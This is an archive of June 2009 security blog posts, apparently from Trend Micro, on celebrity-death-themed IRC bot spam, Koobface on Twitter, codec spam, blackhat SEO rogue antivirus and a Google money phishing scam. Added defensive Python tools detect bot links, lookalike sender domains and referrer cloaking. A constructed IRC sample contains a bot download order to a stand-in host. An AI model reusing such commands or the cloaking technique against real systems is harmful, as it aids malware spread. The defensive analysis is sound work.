Archive for June, 2009


Jun26
by Jovi Umawing (Technical Communications)

Following the sudden and shocking death of the King of Pop, Senior Threat Researcher Loucif Kharouni reports that a slew of malicious links referring to Michael Jackson’s last moments in the hospital before his death are being spread in the wild through the MSN instant messaging (IM) application. Below is a sample screenshot of an MSN IM window containing several templates of the said malicious links:

Screenshot

Recipients who click on any of these links are not taken to an image site or gallery; instead they are prompted to save an executable named PIC-IMG029-www.hi5.com.exe (MD5 checksum 031429fc14151f94c8651a3fb110c19b). Initial analysis shows that the file is a variant of the SDBOT family.

More updates shortly. Stay tuned.

Update as of 27 June 2009

The templated messages are pushed to the bot over an IRC channel by the botnet’s controller, and the client then spams them to its contacts. Below is a sample screenshot of the botnet’s activity:


The malware responsible is detected as WORM_IRCBOT.GAT. It opens a port on the affected system and listens for remote commands. Kharouni reports that the affected system receives and executes commands to download further files, which ultimately leads to the download of a PUSHDO variant. PUSHDO is a botnet responsible for a huge amount of spam activity. More information on PUSHDO can be found here.
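The IRC channel is where a bot of this kind receives both its download orders and the message templates it spams out, so it is also where a network analyst can watch for them. The following is an added example (not code from the original post or from Trend Micro) that parses server-to-client IRC lines using RFC 1459 framing and flags any PRIVMSG carrying a link to a Windows executable. The sample traffic is constructed, and the ".dl" and ".msn" command names and all host names in it are hypothetical; real bot command syntax varies by family.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed sample of server-to-client IRC traffic, NOT a real capture.
# The ".dl"/".msn" command names and every host name here are hypothetical.
SAMPLE_IRC = """\
:irc.example.invalid 001 bot0xA3 :Welcome to the network
:bot0xA3!x@10.0.0.7 JOIN :#ops
:herder!h@10.0.0.2 PRIVMSG #ops :.dl http://dl.example.invalid/pic.exe 1
:herder!h@10.0.0.2 PRIVMSG #ops :.msn Check this out! http://img.example.invalid/PIC-IMG029-www.hi5.com.exe
:friend!f@10.0.0.9 PRIVMSG #ops :see http://example.invalid/photos/gallery.html
PING :irc.example.invalid
"""

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".bat", ".cmd")


@dataclass
class IrcMessage:
    prefix: Optional[str]      # "nick!user@host" or server name, without the leading ':'
    command: str               # PRIVMSG, JOIN, PING, or a numeric reply such as 001
    params: List[str]          # middle parameters (channel or target nick, ...)
    trailing: Optional[str]    # text after " :" (the message body)


def parse_irc_line(line: str) -> IrcMessage:
    """Split one IRC line into prefix / command / params / trailing (RFC 1459 framing)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    return IrcMessage(prefix, parts[0].upper() if parts else "", parts[1:], trailing)


def executable_urls(text: str) -> List[str]:
    """Return the URLs in `text` whose path ends in a Windows executable extension."""
    return [u for u in URL_RE.findall(text)
            if urlsplit(u).path.lower().endswith(EXECUTABLE_EXT)]


@dataclass
class Alert:
    sender: str        # nick of the party that issued the message
    target: str        # channel or nick the PRIVMSG was addressed to
    urls: List[str]    # executable links found in the message body


def scan_irc_log(log: str) -> List[Alert]:
    """Flag PRIVMSGs that carry a link to an executable: a download order or a spam template."""
    alerts = []
    for raw in log.splitlines():
        if not raw.strip():
            continue
        msg = parse_irc_line(raw)
        if msg.command != "PRIVMSG" or not msg.trailing:
            continue
        urls = executable_urls(msg.trailing)
        if urls:
            nick = msg.prefix.split("!", 1)[0] if msg.prefix else "?"
            alerts.append(Alert(nick, msg.params[0] if msg.params else "", urls))
    return alerts


if __name__ == "__main__":
    for a in scan_irc_log(SAMPLE_IRC):
        print(f"{a.sender} -> {a.target}: {a.urls}")
```

Run against the constructed sample, the two controller messages are flagged and the benign gallery link is not. In practice the same parser would be fed from a capture of the bot’s outbound IRC connection (the port the worm opens and the C&C port are both worth watching), and the extracted URLs are the indicators to block.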

A whitepaper showing findings by the research of Trend Micro analysts on PUSHDO/CUTWAIL is also available and can be downloaded here.

Trend Micro customers can rest assured that all related URLs are already blocked by the Smart Protection Network.


 

Jun25
by Jonell Baltazar (Advanced Threats Researcher)

Twitter is a very popular platform for expressing whatever is on a user’s mind, which makes it a favorite target of malware authors. Trend Micro has published several blog entries discussing attacks on Twitter. Now the creators of Koobface have added a new component to the malware to target the vast number of Twitter users, alongside the latest update to the Koobface loader binary and the other known Koobface components that target social networking sites such as Facebook, MySpace, Hi5, Bebo, Tagged, and Netlog.

The new component posts tweets from the victim’s Twitter account by reusing the session cookies stored by the victim’s browser rather than by stealing a password. Since the Koobface binary runs in the background, posting succeeds most reliably while the victim is currently logged in to his/her Twitter account.


Figure 1. Twitter account of an infected PC

The tweet text is retrieved from a Koobface C&C domain, and the URL included in each message is shortened through tinyurl.com, which also hides the real destination from the reader.


Figure 2. Network stream of an affected PC

Visiting the posted URL leads to a Koobface redirector page, which opens the same old fake YouTube page hosting the Koobface loader, presented as an Adobe Flash Player update: the infamous setup.exe.


Figure 3. Fake YouTube page that installs setup.exe

As with earlier Koobface-related attacks, Trend Micro product users need not worry about being infected, as the Smart Protection Network already blocks the malicious sites and prevents the files from running on their systems. They should still keep in mind, however, that an ounce of prevention is always better than a pound of cure.


Update on June 28:

Setup.exe is now detected as WORM_KOOBFACE.DC. It collects information from the affected PC and sends it to remote URLs via HTTP POST.

Moreover, the Koobface writers immediately updated their malicious tweets to exploit the current events surrounding Michael Jackson’s death. Fortunately, the URL included in the message did not change and is still blocked by the Smart Protection Network.

Along with the updated tweets is an update of a Koobface binary (TROJ_KOOBFACE.AJ) targeting Facebook. This binary is already being processed. More details will be provided as analysis progresses.

 

Jun25
by Nino Penoliar (Anti-spam Research Engineer)

As the controversy around Italian Prime Minister Silvio Berlusconi grows, spammers are taking advantage of the news to lure victims into their malicious schemes.

The spammed mail claims to come from YouTube, but checking the sender’s domain reveals that it actually came from youtorube.com, a lookalike of the real youtube.com.


Figure 1. Notice the extra letters in the sender domain
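The check described above, comparing the sender’s domain with the domain the mail claims to represent, can be automated. The following is an added example written for this post (not Trend Micro code and not part of any product) that extracts the domain from a From: header and classifies it against a small brand list: an exact match or subdomain is accepted, a domain within two edits of a brand domain (youtorube.com against youtube.com) is flagged as a lookalike, and a display name that claims a brand the domain does not belong to is flagged as a mismatch. The brand list and all addresses in the test cases are constructed for the example.

```python
from email.utils import parseaddr
from typing import Dict, Optional, Tuple

# Brands we expect mail from, keyed by their real domain (constructed list for the example).
BRAND_DOMAINS: Dict[str, str] = {"youtube.com": "youtube", "paypal.com": "paypal"}


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert / delete / substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                  # delete ca
                           cur[j - 1] + 1,               # insert cb
                           prev[j - 1] + (ca != cb)))    # substitute
        prev = cur
    return prev[-1]


def sender_domain(from_header: str) -> Optional[str]:
    """Domain of the address in a From: header, or None if there is no usable address."""
    _, addr = parseaddr(from_header)
    if "@" not in addr:
        return None
    return addr.rsplit("@", 1)[1].lower().strip(".")


def check_sender(from_header: str, max_distance: int = 2) -> Tuple[str, Optional[str]]:
    """Classify a From: header against BRAND_DOMAINS.

    Returns (verdict, brand_domain); verdict is one of
    ok, lookalike, display-name-mismatch, brand-in-domain, unknown, invalid.
    """
    domain = sender_domain(from_header)
    if domain is None:
        return "invalid", None
    display = parseaddr(from_header)[0].lower()

    # Exact brand domain, or a subdomain of it (news.youtube.com).
    for brand in BRAND_DOMAINS:
        if domain == brand or domain.endswith("." + brand):
            return "ok", brand

    # Typosquat: within a couple of edits of a brand domain (youtorube.com vs youtube.com).
    closest = min(BRAND_DOMAINS, key=lambda b: levenshtein(domain, b))
    if levenshtein(domain, closest) <= max_distance:
        return "lookalike", closest

    # The display name claims a brand whose domain the sender does not use.
    for brand, name in BRAND_DOMAINS.items():
        if name in display:
            return "display-name-mismatch", brand

    # The brand name is embedded in an unrelated domain (youtube-video.example.net).
    for brand, name in BRAND_DOMAINS.items():
        if name in domain:
            return "brand-in-domain", brand

    return "unknown", None


if __name__ == "__main__":
    for hdr in ("YouTube Service <service@youtorube.com>",
                "YouTube <noreply@youtube.com>",
                "YouTube <x@example.net>",
                "bob@example.net"):
        print(f"{hdr!r}: {check_sender(hdr)}")
```

The From: header itself is trivially forged, so a verdict of "ok" only means the claimed domain is plausible; a mail gateway should pair this check with SPF/DKIM results for the same domain. The edit-distance threshold of two catches inserted, dropped or swapped letters but not homoglyphs or IDN tricks, which need a separate confusable-character check.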

Below is the rough translation of the mail from Italian to English:

Have you seen what our Prime Minister Silvio Berlusconi has been up to? Have you followed the story about the escort?
Thanks to a journalist from LAW, we have the chance to see our premier running around with the escort,
leaving little to the newspapers... if you want to see it, here is the link: http://you{BLOCKED}e.com/watchv=W3k9pMtrccQ.html
TO VIEW THE VIDEO IT IS NECESSARY TO INSTALL THE FOLLOWING CODEC

Below is the screenshot of the mail:


Figure 2. Spam sample

To view the supposed video, the user must first download and install a video codec; clicking the link downloads a malicious file named wmpcodec.exe, which is detected as WORM_KOLAB.DI. The spam mail is detected by TMASE Full Pattern 6726, and all related URLs are now blocked by Trend Micro.

 

Jun25
by Macky Cruz (Technical Communications)

Cybercriminals take the low road once again as they pepper the Internet with blackhat SEO links designed to attract users searching for news about the death of Charlie’s Angels star Farrah Fawcett, who died at age 62 after a long struggle with cancer.

Figure 1. Blackhat SEO links for Farrah Fawcett searches set in

Hosted on is-the-boss domains (last seen in the H1N1 blackhat SEO attack), the links that come up in search results redirect to other URLs that eventually land on all-too-familiar territory: a rogue antivirus download.

In one specific infection chain traced by Research Manager Ivan Macalintal, the initial link redirects to another URL in the same domain, which then redirects to a third URL that checks the HTTP Referer header before serving its content, so a request that does not carry the expected referrer (for example a researcher fetching the URL directly) gets nothing. This is an evasion technique used by cybercriminals to avoid analysis by security researchers and to avoid being crawled (and rated) by search engines.

Once the requester passes the check, the URL redirects through two more URLs before finally landing on a download page within a certain thesecuritytools domain, now blocked by Trend Micro. The page serves install.exe, a rogue antivirus detected as TROJ_FAKEAV.BBM.
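The practical way to expose a referrer-gated hop like the one above is to walk the chain twice, once directly and once with a search-engine Referer, and compare where each walk ends. The following is an added example (not code from the original post, not Trend Micro’s tooling) of a small redirect-chain follower that does exactly that. To keep it runnable offline, the "site" is an in-memory table of handlers standing in for HTTP servers; the hop URLs, the search-engine host list and the landing page body are all constructed and hypothetical. The same follower applies to the Koobface tinyurl.com redirector chain described in the Twitter post above: a URL shortener is just another 30x hop.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import urlsplit


@dataclass
class Response:
    status: int
    location: Optional[str] = None   # set on a 30x hop
    body: str = ""                   # set on a final page


# A hop is a function from request headers to a Response (in-memory stand-in for an HTTP server).
Handler = Callable[[Dict[str, str]], Response]

# Loose substring match on the Referer host; a production tool would check the registrable domain.
SEARCH_ENGINE_HOSTS = ("google.", "bing.", "yahoo.")


def redirect_to(next_url: str) -> Handler:
    """Plain redirector hop."""
    return lambda headers: Response(302, location=next_url)


def referrer_gated(next_url: str) -> Handler:
    """Cloaking hop: continue the chain only when the Referer names a search engine, else a blank page."""
    def handler(headers: Dict[str, str]) -> Response:
        host = urlsplit(headers.get("Referer", "")).netloc.lower()
        if any(se in host for se in SEARCH_ENGINE_HOSTS):
            return Response(302, location=next_url)
        return Response(200, body="<html><body></body></html>")
    return handler


def final_page(body: str) -> Handler:
    return lambda headers: Response(200, body=body)


# Constructed chain with the same shape as the one described above; all hosts are hypothetical.
SITE: Dict[str, Handler] = {
    "http://a.example.invalid/farrah.html": redirect_to("http://a.example.invalid/go.php"),
    "http://a.example.invalid/go.php":      referrer_gated("http://b.example.invalid/in.cgi"),
    "http://b.example.invalid/in.cgi":      redirect_to("http://c.example.invalid/land"),
    "http://c.example.invalid/land":        redirect_to("http://tools.example.invalid/scan/"),
    "http://tools.example.invalid/scan/":   final_page('<a href="install.exe">Download</a>'),
}


def follow(start: str, referer: Optional[str] = None, site: Dict[str, Handler] = SITE,
           max_hops: int = 10) -> Tuple[List[str], Response]:
    """Walk a redirect chain; return (urls visited in order, final response).

    Browsers keep the original Referer across HTTP redirects, so the same header is
    sent at every hop, which is why a later hop can still see the search-engine referrer.
    """
    headers = {"Referer": referer} if referer else {}
    url, hops = start, []
    while len(hops) < max_hops:
        hops.append(url)
        handler = site.get(url)
        if handler is None:
            return hops, Response(404)
        resp = handler(headers)
        if resp.status in (301, 302, 303, 307, 308) and resp.location:
            url = resp.location
            continue
        return hops, resp
    raise RuntimeError(f"more than {max_hops} hops; probable redirect loop")


def compare_visits(start: str, site: Dict[str, Handler] = SITE) -> Dict[str, object]:
    """Fetch once directly and once as if clicked from a search result; a different end means cloaking."""
    direct_hops, direct = follow(start, None, site)
    search_hops, search = follow(start, "http://www.google.com/search?q=farrah+fawcett", site)
    return {
        "direct": direct_hops,
        "from_search": search_hops,
        "cloaked": direct_hops[-1] != search_hops[-1] or direct.body != search.body,
        "payload_page": search.body if search.status == 200 else "",
    }


if __name__ == "__main__":
    r = compare_visits("http://a.example.invalid/farrah.html")
    print("direct      :", " -> ".join(r["direct"]))
    print("from search :", " -> ".join(r["from_search"]))
    print("cloaked     :", r["cloaked"])
```

Against a live chain the handlers would be replaced by real requests with redirects disabled, so that every hop is recorded rather than silently followed; the comparison logic stays the same. Kits of this kind also commonly gate on the User-Agent header, so the same two-visit comparison is worth repeating with a common browser User-Agent.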

As this report is being written our engineers are analyzing the behavior of this malware. Trend Micro Smart Protection Network already blocks malicious URLs related to this attack.

Not long after news of Farrah Fawcett’s passing hit the mainstream media, singer and entertainer Michael Jackson likewise died unexpectedly. Users are advised to exercise extreme caution when searching for news and information surrounding the deaths of these celebrities.

One of the more notable blackhat SEO attacks we have documented so far is the one that followed shortly after Heath Ledger’s death.

Update (2:30 am (UTC-7)): TROJ_FAKEAV.BBM behaves fairly similarly to other rogue antivirus we’ve seen to date. Here’s a screenshot of its “scanning window”:

Figure 2. The rogue antivirus program’s window

Users who have the misfortune of seeing “System Security Antivirus” appear on their system are advised to run their legitimate antivirus product.

 

Jun25

We have recently discovered a form of online fraud that takes the guise of a legitimate-looking news website. At first glance the content of the purported news page appears real, but closer analysis shows that it is actually a spam site.


What is presented as a news article is actually a write-up explaining how Google can supposedly give online users the opportunity to earn easy money. To make it more convincing, the page also carries several positive responses from anonymous online users. Clicking any of the links on the spam site shown above leads to a phishing page.

The page contains a fake countdown timer meant to pressure the user into filling out the form quickly. Clicking the See If I Qualify button then leads to another page affirming that the user qualifies, which in turn requires him/her to fill out a second form with his/her credit card information.

Related phishing schemes have been found using the same technique under names other than Google Cash Club. Below are some of the names used:

  • Make Money with Google
  • Google Money Monster
  • Google Home Income
  • Easy Google Profit
  • Google’s Business Kit

Inquiries on the legitimacy of the service have been posted on Google’s support forum, and we agree with what most of the users have posted: Google Cash Club is a scam.

The phishing URL is already blocked by the Trend Micro Smart Protection Network.

 


© Copyright 2009 Trend Micro Inc. All rights reserved. Legal Notice